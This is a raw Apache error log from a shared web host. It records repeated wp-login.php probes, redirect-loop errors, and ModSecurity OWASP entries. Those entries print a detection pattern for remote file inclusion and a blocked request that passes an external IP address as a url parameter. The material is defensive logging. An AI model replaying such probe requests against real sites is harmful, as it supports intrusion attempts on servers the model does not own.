[Tue May 12 07:00:56.912747 2026] [:error] [pid 1844863:tid 1844874] [client 91.224.92.99:58172] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:57.017300 2026] [:error] [pid 1844863:tid 1844874] [client 91.224.92.99:58172] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:57.136704 2026] [:error] [pid 1844863:tid 1844874] [client 91.224.92.99:58172] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:57.242120 2026] [:error] [pid 1844863:tid 1844874] [client 91.224.92.99:58172] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:57.623582 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:57.736372 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:57.846221 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:57.946703 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.056661 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.170787 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.284422 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.390855 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.507447 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.618249 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.724460 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.836454 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:58.949544 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:59.053453 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:59.165124 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:59.259173 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:59.360708 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:59.682977 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:59.789674 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:00:59.893008 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.019473 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.138915 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.247713 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.360127 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.464908 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.581947 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.691804 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.798685 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:00.906067 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:01.016847 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:01.123700 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:01:01.247311 2026] [:error] [pid 1820198:tid 1820221] [client 91.224.92.99:60444] File does not exist: /home/cpcentre/public_html/wp-login.php, referer: https://cpc-entreprises.com/wp-login.php
[Tue May 12 07:02:11.797739 2026] [security2:error] [pid 1825179:tid 1825219] [client 3.213.213.161:65262] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://178.128.220.121 found within ARGS:url: https://178.128.220.121/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK0U9r1yOh9Tvizezi6pgAAAFU"]
[Tue May 12 07:02:11.798243 2026] [security2:error] [pid 1825179:tid 1825219] [client 3.213.213.161:65262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK0U9r1yOh9Tvizezi6pgAAAFU"]
[Tue May 12 07:02:11.798499 2026] [security2:error] [pid 1825179:tid 1825219] [client 3.213.213.161:65262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK0U9r1yOh9Tvizezi6pgAAAFU"]
[Tue May 12 07:04:25.602151 2026] [security2:error] [pid 1844863:tid 1844872] [client 43.157.22.109:36216] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/page.php"] [unique_id "agK02faAnTZtx1_H_wzU4wAAAUM"]
[Tue May 12 07:05:20.256376 2026] [ssl:error] [pid 1844863:tid 1844893] (EAI 2)Name or service not known: [client 192.178.6.9:50687] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:05:20.256425 2026] [ssl:error] [pid 1844863:tid 1844893] AH01941: stapling_renew_response: responder error
[Tue May 12 07:07:02.077319 2026] [core:error] [pid 1825179:tid 1825215] [client 4.193.137.131:19852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:02.077348 2026] [core:error] [pid 1825179:tid 1825215] [client 4.193.137.131:19852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:02.566169 2026] [core:error] [pid 1820198:tid 1820216] [client 4.193.137.131:19872] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:02.566205 2026] [core:error] [pid 1820198:tid 1820216] [client 4.193.137.131:19872] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:03.043430 2026] [core:error] [pid 1825287:tid 1825307] [client 4.193.137.131:19889] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:03.043456 2026] [core:error] [pid 1825287:tid 1825307] [client 4.193.137.131:19889] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:03.519744 2026] [core:error] [pid 1820198:tid 1820200] [client 4.193.137.131:19845] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:03.519772 2026] [core:error] [pid 1820198:tid 1820200] [client 4.193.137.131:19845] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:04.021370 2026] [core:error] [pid 1844863:tid 1844872] [client 4.193.137.131:19840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:04.021406 2026] [core:error] [pid 1844863:tid 1844872] [client 4.193.137.131:19840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:04.509956 2026] [core:error] [pid 1825179:tid 1825202] [client 4.193.137.131:19857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:04.509991 2026] [core:error] [pid 1825179:tid 1825202] [client 4.193.137.131:19857] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:04.709362 2026] [security2:error] [pid 1844863:tid 1844873] [client 43.140.247.223:50184] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.domaine-de-janasse.com"] [uri "/"] [unique_id "agK1ePaAnTZtx1_H_wzWQQAAAUQ"]
[Tue May 12 07:07:04.985612 2026] [core:error] [pid 1820198:tid 1820215] [client 4.193.137.131:19844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:04.985644 2026] [core:error] [pid 1820198:tid 1820215] [client 4.193.137.131:19844] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:05.476051 2026] [core:error] [pid 1808852:tid 1808857] [client 4.193.137.131:19876] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:05.476083 2026] [core:error] [pid 1808852:tid 1808857] [client 4.193.137.131:19876] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:05.978339 2026] [core:error] [pid 1842385:tid 1842404] [client 4.193.137.131:19882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:05.978369 2026] [core:error] [pid 1842385:tid 1842404] [client 4.193.137.131:19882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:06.467036 2026] [core:error] [pid 1825287:tid 1825324] [client 4.193.137.131:19849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:06.467067 2026] [core:error] [pid 1825287:tid 1825324] [client 4.193.137.131:19849] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:06.941697 2026] [core:error] [pid 1844863:tid 1844871] [client 4.193.137.131:19873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:06.941722 2026] [core:error] [pid 1844863:tid 1844871] [client 4.193.137.131:19873] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:07.415300 2026] [core:error] [pid 1844863:tid 1844892] [client 4.193.137.131:19856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:07.415331 2026] [core:error] [pid 1844863:tid 1844892] [client 4.193.137.131:19856] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:07.891007 2026] [core:error] [pid 1825287:tid 1825322] [client 4.193.137.131:19900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:07.891030 2026] [core:error] [pid 1825287:tid 1825322] [client 4.193.137.131:19900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:08.366238 2026] [core:error] [pid 1825179:tid 1825203] [client 4.193.137.131:19858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:08.366271 2026] [core:error] [pid 1825179:tid 1825203] [client 4.193.137.131:19858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:08.842609 2026] [core:error] [pid 1820198:tid 1820217] [client 4.193.137.131:19868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:08.842635 2026] [core:error] [pid 1820198:tid 1820217] [client 4.193.137.131:19868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:09.317613 2026] [core:error] [pid 1825287:tid 1825310] [client 4.193.137.131:19859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:09.317639 2026] [core:error] [pid 1825287:tid 1825310] [client 4.193.137.131:19859] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:09.791167 2026] [core:error] [pid 1844863:tid 1844877] [client 4.193.137.131:19892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:09.791194 2026] [core:error] [pid 1844863:tid 1844877] [client 4.193.137.131:19892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:10.270721 2026] [core:error] [pid 1825287:tid 1825321] [client 4.193.137.131:19887] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:10.270754 2026] [core:error] [pid 1825287:tid 1825321] [client 4.193.137.131:19887] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:10.745420 2026] [core:error] [pid 1825287:tid 1825320] [client 4.193.137.131:19848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:10.745450 2026] [core:error] [pid 1825287:tid 1825320] [client 4.193.137.131:19848] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:11.221291 2026] [core:error] [pid 1844863:tid 1844893] [client 4.193.137.131:19902] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:11.221320 2026] [core:error] [pid 1844863:tid 1844893] [client 4.193.137.131:19902] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:11.710368 2026] [core:error] [pid 1844863:tid 1844883] [client 4.193.137.131:19867] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:11.710393 2026] [core:error] [pid 1844863:tid 1844883] [client 4.193.137.131:19867] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:12.186064 2026] [core:error] [pid 1842385:tid 1842397] [client 4.193.137.131:19842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:12.186107 2026] [core:error] [pid 1842385:tid 1842397] [client 4.193.137.131:19842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:12.662801 2026] [core:error] [pid 1825287:tid 1825319] [client 4.193.137.131:19855] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:12.662837 2026] [core:error] [pid 1825287:tid 1825319] [client 4.193.137.131:19855] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:13.139320 2026] [core:error] [pid 1820198:tid 1820213] [client 4.193.137.131:19871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:13.139347 2026] [core:error] [pid 1820198:tid 1820213] [client 4.193.137.131:19871] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:13.627989 2026] [core:error] [pid 1808852:tid 1808869] [client 4.193.137.131:19866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:13.628018 2026] [core:error] [pid 1808852:tid 1808869] [client 4.193.137.131:19866] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:14.109391 2026] [core:error] [pid 1825287:tid 1825314] [client 4.193.137.131:19851] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:14.109420 2026] [core:error] [pid 1825287:tid 1825314] [client 4.193.137.131:19851] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:14.602082 2026] [core:error] [pid 1825287:tid 1825308] [client 4.193.137.131:19870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:14.602109 2026] [core:error] [pid 1825287:tid 1825308] [client 4.193.137.131:19870] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:15.093817 2026] [core:error] [pid 1825287:tid 1825329] [client 4.193.137.131:19868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:15.093845 2026] [core:error] [pid 1825287:tid 1825329] [client 4.193.137.131:19868] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:15.597460 2026] [core:error] [pid 1820198:tid 1820204] [client 4.193.137.131:19852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:15.597508 2026] [core:error] [pid 1820198:tid 1820204] [client 4.193.137.131:19852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:16.110239 2026] [core:error] [pid 1808852:tid 1808877] [client 4.193.137.131:19840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:16.110265 2026] [core:error] [pid 1808852:tid 1808877] [client 4.193.137.131:19840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:16.598015 2026] [core:error] [pid 1842385:tid 1842415] [client 4.193.137.131:19863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:16.598039 2026] [core:error] [pid 1842385:tid 1842415] [client 4.193.137.131:19863] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:17.072657 2026] [core:error] [pid 1825179:tid 1825204] [client 4.193.137.131:19476] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:17.072690 2026] [core:error] [pid 1825179:tid 1825204] [client 4.193.137.131:19476] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:17.572391 2026] [core:error] [pid 1842385:tid 1842390] [client 4.193.137.131:19869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:07:17.572423 2026] [core:error] [pid 1842385:tid 1842390] [client 4.193.137.131:19869] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
